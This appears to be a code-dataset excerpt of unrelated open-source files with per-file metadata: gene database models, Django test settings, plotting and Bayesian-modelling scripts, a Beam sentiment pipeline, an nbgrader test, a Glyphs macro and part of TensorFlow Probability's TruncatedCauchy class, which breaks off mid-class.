__tablename__ = RAT_GENE_TABLE_NAME
id = Column(Integer, primary_key=True)
entrez_id = Column(String(255), doc='entrez id of the protein')
rgd_id = Column(String(255), doc='RGD id of the protein')
rgd_symbol = Column(String(255), doc='RGD symbol of the protein')
human_genes = relationship(
HumanGene,
secondary=human_rat,
backref='rat_genes',
)
class GeneFamily(CompathPathwayMixin, Base):
"""A SQLAlchemy model for an HGNC Gene family."""
__tablename__ = GENE_FAMILY_TABLE_NAME
id = Column(Integer, primary_key=True)
identifier = Column(String(255), doc='HGNC gene family id of the protein')
symbol = Column(String(255), doc='HGNC gene family symbol of the protein')
name = Column(String(255), doc='HGNC gene family name of the protein')
proteins = relationship(
HumanGene,
secondary=human_family,
backref='gene_families',
)
| src/bio2bel_hgnc/models.py | 3,634 | A SQLAlchemy model for an HGNC Gene family.
A SQLAlchemy model for a human gene.
A SQLAlchemy model for a mouse gene.
A SQLAlchemy model for an rat gene.
SQLAlchemy models for Bio2BEL HGNC.
-*- coding: utf-8 -*- | 213 | en | 0.723093 |
"""
With these settings, tests run faster.
"""
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env(
"DJANGO_SECRET_KEY",
default="Zr7lk4kl3mUPXfmrsWWDcfVMuZW6PPy2fULMUv7yTwy4agkNObBGiyyGVahi78ed",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#test-runner
TEST_RUNNER = "django.test.runner.DiscoverRunner"
# CACHES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
"default": {
"BACKEND": "django.core.cache.backends.locmem.LocMemCache",
"LOCATION": "",
}
}
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"]
# TEMPLATES
# ------------------------------------------------------------------------------
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend"
# Your stuff...
# ------------------------------------------------------------------------------
| config/settings/test.py | 1,679 | With these settings, tests run faster.
noqa GENERAL ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/secret-key https://docs.djangoproject.com/en/dev/ref/settings/test-runner CACHES ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/caches PASSWORDS ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/password-hashers TEMPLATES ------------------------------------------------------------------------------ noqa F405 EMAIL ------------------------------------------------------------------------------ https://docs.djangoproject.com/en/dev/ref/settings/email-backend Your stuff... ------------------------------------------------------------------------------ | 900 | en | 0.371199 |
#!/usr/bin/env python
import sys, os
import itertools, operator
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
def reader(myfile):
t = np.array([])
print(myfile)
with open(myfile) as f:
lines = f.readlines()
for line in lines:
parts = line.split(" ")
if(len(parts)>1):
t=np.append(t,float(parts[7]))
f.close()
return t
def tuples_by_dispatch_width(tuples):
ret = []
tuples_sorted = sorted(tuples, key=operator.itemgetter(0))
for key,group in itertools.groupby(tuples_sorted,operator.itemgetter(0)):
ret.append((key, zip(*map(lambda x: x[1:], list(group)))))
return ret
def printgraphs(results_tuples,filename,title):
global_ws = [1,2,4,8,16,32,64]
plt.clf()
plt.cla()
markers = ['.', 'o', 'v', '*', 'D']
fig = plt.figure()
plt.grid(True)
plt.title(title)
ax = plt.subplot(111)
ax.set_xlabel("$Threads$")
ax.set_ylabel("$Throughput(Mops/sec)$")
i = 0
c="b"
tuples_by_dw = tuples_by_dispatch_width(results_tuples)
for tuple in tuples_by_dw:
dw = tuple[0]
ws_axis = tuple[1][0]
ipc_axis = tuple[1][1]
x_ticks = np.arange(0, len(global_ws))
x_labels = map(str, global_ws)
ax.xaxis.set_ticks(x_ticks)
ax.xaxis.set_ticklabels(x_labels)
#ax.yaxis.set_ticks(np.arange(0,210,10))
print x_ticks
print ipc_axis
if(i==1): c="r"
ax.plot(x_ticks, ipc_axis, label="Configuration "+str(dw), marker=markers[i%len(markers)],color=c)
i = i + 1
lgd = ax.legend(ncol=len(tuples_by_dw), bbox_to_anchor=(0.75, -0.15), prop={'size':8})
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
def lastplotter(t1,t2):
results_tuples = []
results_tuples.append((1,1,t1[0]))
results_tuples.append((1,2,t1[1]))
results_tuples.append((1,4,t1[2]))
results_tuples.append((1,8,t1[3]))
results_tuples.append((1,16,t1[4]))
results_tuples.append((1,32,t1[5]))
results_tuples.append((1,64,t1[6]))
results_tuples.append((2,1,t2[0]))
results_tuples.append((2,2,t2[1]))
results_tuples.append((2,4,t2[2]))
results_tuples.append((2,8,t2[3]))
results_tuples.append((2,16,t2[4]))
results_tuples.append((2,32,t2[5]))
results_tuples.append((2,64,t2[6]))
return results_tuples
t1 = reader('part11')
t2 = reader('part12')
t3 = reader('part21')
t4 = reader('part22')
print("Done reading files,now let's plot em!")
#print(t1,t2)
# uncomment in order to print line plots
res1 = lastplotter(t1,t2)
printgraphs(res1,'naive_bank.png','Bank accounts 1')
res2 = lastplotter(t3,t4)
printgraphs(res2,'padded_bank.png','Bank accounts 2')
| ex3/z1/graph.py | 2,555 | !/usr/bin/env pythonax.yaxis.set_ticks(np.arange(0,210,10))print(t1,t2) uncomment in order to print line plots | 110 | en | 0.431387 |
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A streaming python pipeline to read in PubSub tweets and perform
classification using Prediction API"""
import argparse
import datetime
import json
import logging
import os
import socket
import apache_beam as beam
import apache_beam.transforms.window as window
from apache_beam.io.gcp.bigquery_tools import parse_table_schema_from_json
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.pipeline_options import GoogleCloudOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.transforms.util import BatchElements
from google.api_core import retry
from google.api_core import exceptions
from google.cloud import language_v1
from google.cloud.language_v1 import enums
TIMEOUT_IN_SEC = 60 * 2 # 2 minutes timeout limit
socket.setdefaulttimeout(TIMEOUT_IN_SEC)
PROJECT_ID = os.getenv('PROJECT_ID')
def get_sentiment(instances_content):
"""Analyzing Sentiment in a String
Args:
text_content The text content to analyze
"""
scores = []
client = language_v1.LanguageServiceClient()
encoding_type = enums.EncodingType.UTF8
language = 'en'
type_ = enums.Document.Type.PLAIN_TEXT
for content in instances_content:
content = content.encode('utf-8') if isinstance(content,
unicode) else str(
content)
document = {'content': content, 'type': type_, 'language': language}
try:
response = client.analyze_sentiment(document,
encoding_type=encoding_type,
timeout=30,
retry=retry.Retry(deadline=60))
# Get overall sentiment of the input document
if response.document_sentiment.score:
scores.append(response.document_sentiment.score)
else:
scores.append(-1)
logging.error(
'Document sentiment score not found for {}'.format(content))
except exceptions.GoogleAPICallError as e:
logging.exception(e)
except exceptions.RetryError as e:
logging.exception(e)
except ValueError as e:
logging.exception(e)
return scores
def prediction_helper(messages):
"""Processes PubSub messages and calls AI Platform prediction.
:param messages:
:return:
"""
# Handle single string.
if not isinstance(messages, list):
messages = [messages]
# Messages from PubSub are JSON strings
instances = list(map(lambda message: json.loads(message), messages))
# Estimate the sentiment of the 'text' of each tweet
scores = get_sentiment(
[instance['text'] for instance in instances if instance.get('text')])
if len(scores) == len(instances):
for i, instance in enumerate(instances):
logging.info('Processed {} instances.'.format(len(instances)))
instance['sentiment'] = scores[i]
return instances
logging.error('Invalid scores {} instances {}'.format(len(scores),
len(instances)))
logging.error(instances)
return
class GroupWindowsIntoBatches(beam.PTransform):
"""A composite transform that groups Pub/Sub messages based on publish
time and outputs a list of dictionaries, where each contains one message
and its publish timestamp.
"""
def __init__(self, window_size):
# Convert minutes into seconds.
self.window_size = int(window_size * 60)
def expand(self, pcoll):
return (
pcoll
# Assigns window info to each Pub/Sub message based on its
# publish timestamp.
| "Window into Fixed Intervals"
>> beam.WindowInto(window.FixedWindows(self.window_size))
| "Add timestamps to messages" >> beam.ParDo(AddTimestamps())
# Use a dummy key to group the elements in the same window.
# Note that all the elements in one window must fit into memory
# for this. If the windowed elements do not fit into memory,
# please consider using `beam.util.BatchElements`.
# https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.html#apache_beam.transforms.util.BatchElements
| "Add Dummy Key" >> beam.Map(lambda elem: (None, elem))
| "Groupby" >> beam.GroupByKey()
| "Abandon Dummy Key" >> beam.MapTuple(lambda _, val: val)
)
class AddTimestamps(beam.DoFn):
@staticmethod
def process(element, publish_time=beam.DoFn.TimestampParam):
"""Processes each incoming windowed element by extracting the Pub/Sub
message and its publish timestamp into a dictionary. `publish_time`
defaults to the publish timestamp returned by the Pub/Sub server. It
is bound to each element by Beam at runtime.
"""
yield {
"message_body": element.decode("utf-8"),
"publish_time": datetime.datetime.utcfromtimestamp(
float(publish_time)
).strftime("%Y-%m-%d %H:%M:%S.%f"),
}
def run(args, pipeline_args=None):
"""Executes Pipeline.
:param args:
:param pipeline_args:
:return:
"""
"""Build and run the pipeline."""
# We use the save_main_session option because one or more DoFn's in this
# workflow rely on global context (e.g., a module imported at module level).
pipeline_options = PipelineOptions(
pipeline_args, streaming=True, save_main_session=True
)
pipeline_options.view_as(StandardOptions).runner = args.runner
# Run on Cloud DataFlow by default
google_cloud_options = pipeline_options.view_as(GoogleCloudOptions)
google_cloud_options.project = PROJECT_ID
google_cloud_options.job_name = 'pubsub-api-bigquery'
google_cloud_options.staging_location = args.staging_location
google_cloud_options.temp_location = args.temp_location
google_cloud_options.region = args.region
p = beam.Pipeline(options=pipeline_options)
lines = p | 'read in tweets' >> beam.io.ReadFromPubSub(
topic=args.input_topic,
with_attributes=False,
id_label='tweet_id') # TODO: Change to PubSub id.
# Window them, and batch them into batches. (Not too large)
output_tweets = (lines | 'assign window key' >> beam.WindowInto(
window.FixedWindows(args.window_size))
| 'batch into n batches' >> BatchElements(
min_batch_size=args.min_batch_size,
max_batch_size=args.max_batch_size)
| 'predict sentiment' >> beam.FlatMap(
lambda messages: prediction_helper(messages))
)
# Make explicit BQ schema for output tables:
bq_schema_json = {"fields": [{"name": "id", "type": "STRING"},
{"name": "text", "type": "STRING"},
{"name": "user_id", "type": "STRING"},
{"name": "sentiment", "type": "FLOAT"},
{"name": "posted_at", "type": "TIMESTAMP"},
{"name": "favorite_count", "type": "INTEGER"},
{"name": "retweet_count", "type": "INTEGER"},
{"name": "media", "type": "STRING"},
]}
bq_schema = parse_table_schema_from_json(json.dumps(bq_schema_json))
# Write to BigQuery
output_tweets | 'store twitter posts' >> beam.io.WriteToBigQuery(
table=args.bigquery_table,
dataset=args.bigquery_dataset,
schema=bq_schema,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
project=PROJECT_ID
)
result = p.run()
result.wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument(
'--input-topic',
help='The Cloud Pub/Sub topic to read from.\n'
'projects/<PROJECT_NAME>/topics/<TOPIC_NAME>',
required=True
)
parser.add_argument(
'--region',
help='The DataFlow region',
default='us-central1'
)
parser.add_argument(
'--staging-location',
help='The DataFlow staging location',
default='gs://<bucket_name>/staging/',
required=True
)
parser.add_argument(
'--temp-location',
help='The DataFlow temp location',
default='gs://<bucket_name>/tmp/',
required=True
)
parser.add_argument(
'--bigquery-dataset',
help='BigQuery dataset',
required=True
)
parser.add_argument(
'--bigquery-table',
help='BigQuery OutPut table',
required=True
)
parser.add_argument(
'--window-size',
type=int,
default=60,
help="Output file's window size in number of seconds",
)
parser.add_argument(
'--min-batch-size',
type=int,
default=1,
help='Min batch size for Windowing',
)
parser.add_argument(
'--max-batch-size',
type=int,
default=100,
help='Min batch size for Windowing',
)
parser.add_argument(
'--runner',
type=str,
default='DataflowRunner',
help='DataFlow running mode',
)
known_args, pipeline_args = parser.parse_known_args()
run(
known_args,
pipeline_args
)
| notebooks/samples/tensorflow/sentiment_analysis/dataflow/PubSubToBigQueryWithAPI.py | 10,311 | A composite transform that groups Pub/Sub messages based on publish
time and outputs a list of dictionaries, where each contains one message
and its publish timestamp.
Analyzing Sentiment in a String
Args:
text_content The text content to analyze
Processes PubSub messages and calls AI Platform prediction.
:param messages:
:return:
Processes each incoming windowed element by extracting the Pub/Sub
message and its publish timestamp into a dictionary. `publish_time`
defaults to the publish timestamp returned by the Pub/Sub server. It
is bound to each element by Beam at runtime.
Executes Pipeline.
:param args:
:param pipeline_args:
:return:
A streaming python pipeline to read in PubSub tweets and perform
classification using Prediction API
Copyright 2020 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 2 minutes timeout limit Get overall sentiment of the input document Handle single string. Messages from PubSub are JSON strings Estimate the sentiment of the 'text' of each tweet Convert minutes into seconds. Assigns window info to each Pub/Sub message based on its publish timestamp. Use a dummy key to group the elements in the same window. Note that all the elements in one window must fit into memory for this. If the windowed elements do not fit into memory, please consider using `beam.util.BatchElements`. https://beam.apache.org/releases/pydoc/current/apache_beam.transforms.util.htmlapache_beam.transforms.util.BatchElements We use the save_main_session option because one or more DoFn's in this workflow rely on global context (e.g., a module imported at module level). Run on Cloud DataFlow by default TODO: Change to PubSub id. Window them, and batch them into batches. (Not too large) Make explicit BQ schema for output tables: Write to BigQuery | 2,264 | en | 0.820158 |
#https://docs.pymc.io/notebooks/GLM-hierarchical-binominal-model.html
import matplotlib.pyplot as plt
import scipy.stats as stats
import numpy as np
import pandas as pd
#import seaborn as sns
import pymc3 as pm
import arviz as az
import theano.tensor as tt
np.random.seed(123)
# rat data (BDA3, p. 102)
y = np.array([
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 5, 2,
5, 3, 2, 7, 7, 3, 3, 2, 9, 10, 4, 4, 4, 4, 4, 4, 4,
10, 4, 4, 4, 5, 11, 12, 5, 5, 6, 5, 6, 6, 6, 6, 16, 15,
15, 9, 4
])
n = np.array([
20, 20, 20, 20, 20, 20, 20, 19, 19, 19, 19, 18, 18, 17, 20, 20, 20,
20, 19, 19, 18, 18, 25, 24, 23, 20, 20, 20, 20, 20, 20, 10, 49, 19,
46, 27, 17, 49, 47, 20, 20, 13, 48, 50, 20, 20, 20, 20, 20, 20, 20,
48, 19, 19, 19, 22, 46, 49, 20, 20, 23, 19, 22, 20, 20, 20, 52, 46,
47, 24, 14
])
N = len(n)
def logp_ab(value):
''' prior density'''
return tt.log(tt.pow(tt.sum(value), -5/2))
with pm.Model() as model:
# Uninformative prior for alpha and beta
ab = pm.HalfFlat('ab',
shape=2,
testval=np.asarray([1., 1.]))
pm.Potential('p(a, b)', logp_ab(ab))
alpha = pm.Deterministic('alpha', ab[0])
beta = pm.Deterministic('beta', ab[1])
X = pm.Deterministic('X', tt.log(ab[0]/ab[1]))
Z = pm.Deterministic('Z', tt.log(tt.sum(ab)))
theta = pm.Beta('theta', alpha=ab[0], beta=ab[1], shape=N)
p = pm.Binomial('y', p=theta, observed=y, n=n)
#trace = pm.sample(1000, tune=2000, target_accept=0.95)
trace = pm.sample(1000, tune=500, cores=1)
#az.plot_trace(trace)
#plt.savefig('../figures/hbayes_binom_rats_trace.png', dpi=300)
print(az.summary(trace))
J = len(n)
post_mean = np.zeros(J)
samples = trace[theta]
post_mean = np.mean(samples, axis=0)
print('post mean')
print(post_mean)
alphas = trace['alpha']
betas = trace['beta']
alpha_mean = np.mean(alphas)
beta_mean = np.mean(betas)
hyper_mean = alpha_mean/(alpha_mean + beta_mean)
print('hyper mean')
print(hyper_mean)
mle = y / n
pooled_mle = np.sum(y) / np.sum(n)
print('pooled mle')
print(pooled_mle)
axes = az.plot_forest(
trace, var_names='theta', credible_interval=0.95, combined=True, colors='cycle')
y_lims = axes[0].get_ylim()
axes[0].vlines(hyper_mean, *y_lims)
plt.savefig('../figures/hbayes_binom_rats_forest95.pdf', dpi=300)
J = len(n)
fig, axs = plt.subplots(4,1, figsize=(10,10))
plt.subplots_adjust(hspace=0.3)
axs = np.reshape(axs, 4)
xs = np.arange(J)
ax = axs[0]
ax.bar(xs, y)
ax.set_title('number of postives')
ax = axs[1]
ax.bar(xs, n)
ax.set_title('popn size')
ax = axs[2]
ax.bar(xs, mle)
ax.set_ylim(0, 0.5)
ax.hlines(pooled_mle, 0, J, 'r', lw=3)
ax.set_title('MLE (red line = pooled)')
ax = axs[3]
ax.bar(xs, post_mean)
ax.hlines(hyper_mean, 0, J, 'r', lw=3)
ax.set_ylim(0, 0.5)
ax.set_title('posterior mean (red line = hparam)')
plt.savefig('../figures/hbayes_binom_rats_barplot.pdf', dpi=300)
J = len(n)
xs = np.arange(J)
fig, ax = plt.subplots(1,1)
ax.bar(xs, y)
ax.set_title('number of postives')
plt.savefig('../figures/hbayes_binom_rats_outcomes.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, n)
ax.set_title('popn size')
plt.savefig('../figures/hbayes_binom_rats_popsize.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, mle)
ax.set_ylim(0, 0.5)
ax.hlines(pooled_mle, 0, J, 'r', lw=3)
ax.set_title('MLE (red line = pooled)')
plt.savefig('../figures/hbayes_binom_rats_MLE.pdf', dpi=300)
fig, ax = plt.subplots(1,1)
ax.bar(xs, post_mean)
ax.hlines(hyper_mean, 0, J, 'r', lw=3)
ax.set_ylim(0, 0.5)
ax.set_title('posterior mean (red line = hparam)')
plt.savefig('../figures/hbayes_binom_rats_postmean.pdf', dpi=300)
| scripts/hbayes_binom_rats_pymc3.py | 3,785 | prior density
https://docs.pymc.io/notebooks/GLM-hierarchical-binominal-model.htmlimport seaborn as sns rat data (BDA3, p. 102) Uninformative prior for alpha and betatrace = pm.sample(1000, tune=2000, target_accept=0.95)az.plot_trace(trace)plt.savefig('../figures/hbayes_binom_rats_trace.png', dpi=300) | 303 | en | 0.394721 |
import os
from os.path import join
from ...utils import remove
from .. import run_nbgrader
from .base import BaseTestApp
class TestNbGraderExport(BaseTestApp):
def test_help(self):
"""Does the help display without error?"""
run_nbgrader(["export", "--help-all"])
def test_export(self, db, course_dir):
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.db_assignments = [
dict(name='ps1', duedate='2015-02-02 14:58:23.948203 PST'),
dict(name='ps2', duedate='2015-02-02 14:58:23.948203 PST')]\n""")
fh.write("""c.CourseDirectory.db_students = [dict(id="foo"), dict(id="bar")]""")
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps1", "p1.ipynb"))
self._copy_file(join("files", "submitted-unchanged.ipynb"), join(course_dir, "source", "ps2", "p1.ipynb"))
run_nbgrader(["assign", "ps1", "--db", db])
run_nbgrader(["assign", "ps2", "--db", db])
self._copy_file(join("files", "submitted-changed.ipynb"), join(course_dir, "submitted", "bar", "ps1", "p1.ipynb"))
self._copy_file(join("files", "submitted-changed.ipynb"), join(course_dir, "submitted", "foo", "ps2", "p1.ipynb"))
run_nbgrader(["autograde", "ps1", "--db", db])
run_nbgrader(["autograde", "ps2", "--db", db])
run_nbgrader(["export", "--db", db])
assert os.path.isfile("grades.csv")
with open("grades.csv", "r") as fh:
contents = fh.readlines()
assert len(contents) == 5
run_nbgrader(["export", "--db", db, "--to", "mygrades.csv"])
assert os.path.isfile("mygrades.csv")
remove("grades.csv")
run_nbgrader(["export", "--db", db, "--exporter", "nbgrader.plugins.CsvExportPlugin"])
assert os.path.isfile("grades.csv")
run_nbgrader(["export", "--db", db, "--exporter=nbgrader.tests.apps.files.myexporter.MyExporter", "--to", "foo.txt"])
assert os.path.isfile("foo.txt")
| nbgrader/tests/apps/test_nbgrader_export.py | 2,046 | Does the help display without error? | 36 | en | 0.746264 |
#MenuTitle: Set Transform Origin
# -*- coding: utf-8 -*-
__doc__="""
Sets origin point for Rotate tool.
"""
import vanilla
class SetTransformOriginWindow( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 370
windowHeight = 60
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Set Transform Origin", # window title
minSize = ( windowWidth, windowHeight ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.SetTransformOriginWindow.mainwindow" # stores last window position and size
)
# UI elements:
self.w.text_1 = vanilla.TextBox( (15-1, 12+3, 75, 14), "Origin:", sizeStyle='small' )
self.w.originX = vanilla.EditText( (65, 12, 70, 15+3), "0.0", sizeStyle = 'small')
self.w.originY = vanilla.EditText( (65+80, 12, 70, 15+3), "0.0", sizeStyle = 'small')
# Run Button:
self.w.resetButton = vanilla.Button((65+160, 12+1, 60, 15), "Get", sizeStyle='small', callback=self.GetTransformOrigin )
self.w.runButton = vanilla.Button((65+160+70, 12+1, 60, 15), "Set", sizeStyle='small', callback=self.SetTransformOriginMain )
self.w.setDefaultButton( self.w.runButton )
# Load Settings:
if not self.GetTransformOrigin(None):
print "Note: 'Set Transform Origin' could not load preferences. Will resort to defaults"
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def GetTransformOrigin( self, sender ):
try:
myController = Glyphs.currentDocument.windowController()
rotateToolClass = NSClassFromString("GlyphsToolRotate")
myRotateTool = myController.toolForClass_( rotateToolClass )
currentOrigin = myRotateTool.transformOrigin()
self.w.originX.set( str(currentOrigin.x) )
self.w.originY.set( str(currentOrigin.y) )
except:
return False
return True
def SetTransformOriginMain( self, sender ):
try:
newOriginX = float(self.w.originX.get())
newOriginY = float(self.w.originY.get())
newOriginPoint = NSPoint( newOriginX, newOriginY )
myController = Glyphs.currentDocument.windowController()
myController.graphicView().setNeedsDisplay_(False)
rotateToolClass = NSClassFromString("GlyphsToolRotate")
myRotateTool = myController.toolForClass_( rotateToolClass )
myRotateTool.setTransformOrigin_( newOriginPoint )
myController.graphicView().setNeedsDisplay_(True)
except Exception, e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print "Set Transform Origin Error: %s" % e
SetTransformOriginWindow() | Paths/Set Transform Origin.py | 2,790 | MenuTitle: Set Transform Origin -*- coding: utf-8 -*- Window 'self.w': user can resize width by this value user can resize height by this value default window size window title minimum size (for resizing) maximum size (for resizing) stores last window position and size UI elements: Run Button: Load Settings: Open window and focus on it: brings macro window to front and reports error: | 386 | en | 0.77844 |
# Copyright 2020 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The Truncated Cauchy distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import sigmoid as sigmoid_bijector
from tensorflow_probability.python.bijectors import softplus as softplus_bijector
from tensorflow_probability.python.distributions import distribution
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import parameter_properties
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import reparameterization
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensor_util
from tensorflow_probability.python.math import numeric
from tensorflow_probability.python.math import special as tfp_math
__all__ = [
'TruncatedCauchy',
]
def _cauchy_cdf_diff(x, y):
return tfp_math.atan_difference(x, y) / np.pi
class TruncatedCauchy(distribution.Distribution):
"""The Truncated Cauchy distribution.
The truncated Cauchy is a Cauchy distribution bounded between `low`
and `high` (the pdf is 0 outside these bounds and renormalized).
Samples from this distribution are differentiable with respect to `loc`
and `scale`, but not with respect to the bounds `low` and `high`.
### Mathematical Details
The probability density function (pdf) of this distribution is:
```none
pdf(x; loc, scale, low, high) =
{ 1 / (pi * scale * (1 + z**2) * A) for low <= x <= high
{ 0 otherwise
z = (x - loc) / scale
A = CauchyCDF((high - loc) / scale) - CauchyCDF((low - loc) / scale)
```
where:
* `CauchyCDF` is the cumulative density function of the Cauchy distribution
with 0 mean and unit variance.
This is a scalar distribution so the event shape is always scalar and the
dimensions of the parameters define the batch_shape.
#### Examples
```python
tfd = tfp.distributions
# Define a batch of two scalar TruncatedCauchy distributions with modes
# at 0. and 1.0 .
dist = tfd.TruncatedCauchy(loc=[0., 1.], scale=1.,
low=[-1., 0.],
high=[1., 1.])
# Evaluate the pdf of the distributions at 0.5 and 0.8 respectively returning
# a 2-vector tensor.
dist.prob([0.5, 0.8])
# Get 3 samples, returning a 3 x 2 tensor.
dist.sample([3])
```
"""
def __init__(self,
loc,
scale,
low,
high,
validate_args=False,
allow_nan_stats=True,
name='TruncatedCauchy'):
"""Construct a TruncatedCauchy.
All parameters of the distribution will be broadcast to the same shape,
so the resulting distribution will have a batch_shape of the broadcast
shape of all parameters.
Args:
loc: Floating point tensor; the modes of the corresponding non-truncated
Cauchy distribution(s).
scale: Floating point tensor; the scales of the distribution(s).
Must contain only positive values.
low: `float` `Tensor` representing lower bound of the distribution's
support. Must be such that `low < high`.
high: `float` `Tensor` representing upper bound of the distribution's
support. Must be such that `low < high`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked at run-time.
allow_nan_stats: Python `bool`, default `True`. When `True`,
statistics (e.g., mean, mode, variance) use the value '`NaN`' to
indicate the result is undefined. When `False`, an exception is raised
if one or more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
dtype = dtype_util.common_dtype([loc, scale, low, high], tf.float32)
self._loc = tensor_util.convert_nonref_to_tensor(
loc, name='loc', dtype=dtype)
self._scale = tensor_util.convert_nonref_to_tensor(
scale, name='scale', dtype=dtype)
self._low = tensor_util.convert_nonref_to_tensor(
low, name='low', dtype=dtype)
self._high = tensor_util.convert_nonref_to_tensor(
high, name='high', dtype=dtype)
dtype_util.assert_same_float_dtype(
[self._loc, self._scale, self._low, self._high])
super(TruncatedCauchy, self).__init__(
dtype=dtype,
# Samples do not have gradients with respect to `_low` and `_high`.
# TODO(b/161297284): Implement these gradients.
reparameterization_type=reparameterization.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
name=name)
def _loc_scale_low_high(self, loc=None, scale=None, low=None, high=None):
loc = tf.convert_to_tensor(self.loc if loc is None else loc)
scale = tf.convert_to_tensor(self.scale if scale is None else scale)
low = tf.convert_to_tensor(self.low if low is None else low)
high = tf.convert_to_tensor(self.high if high is None else high)
return loc, scale, low, high
def _standardized_low_and_high(self,
loc=None,
scale=None,
low=None,
high=None):
loc, scale, low, high = self._loc_scale_low_high(
loc=loc, scale=scale, low=low, high=high)
return (low - loc) / scale, (high - loc) / scale
def _normalizer(self,
loc=None,
scale=None,
low=None,
high=None,
std_low=None,
std_high=None):
if std_low is None or std_high is None:
std_low, std_high = self._standardized_low_and_high(
loc=loc, scale=scale, low=low, high=high)
return _cauchy_cdf_diff(std_high, std_low)
def _log_normalizer(self,
loc=None,
scale=None,
low=None,
high=None,
std_low=None,
std_high=None):
return tf.math.log(self._normalizer(
loc=loc,
scale=scale,
low=low,
high=high,
std_low=std_low,
std_high=std_high))
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
# pylint: disable=g-long-lambda
return dict(
loc=parameter_properties.ParameterProperties(),
scale=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=(
lambda: softplus_bijector.Softplus(low=dtype_util.eps(dtype)))),
low=parameter_properties.ParameterProperties(),
# TODO(b/169874884): Support decoupled parameterization.
high=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,))
# pylint: enable=g-long-lambda
@property
def loc(self):
return self._loc
@property
def scale(self):
return self._scale
@property
def low(self):
return self._low
@property
def high(self):
return self._high
def _batch_shape(self):
return functools.reduce(
tf.broadcast_static_shape,
(self.loc.shape, self.scale.shape, self.low.shape, self.high.shape))
def _batch_shape_tensor(self, loc=None, scale=None, low=None, high=None):
return functools.reduce(
ps.broadcast_shape,
(ps.shape(self.loc if loc is None else loc),
ps.shape(self.scale if scale is None else scale),
ps.shape(self.low if low is None else low),
ps.shape(self.high if high is None else high)))
def _event_shape(self):
return tf.TensorShape([])
def _sample_n(self, n, seed=None):
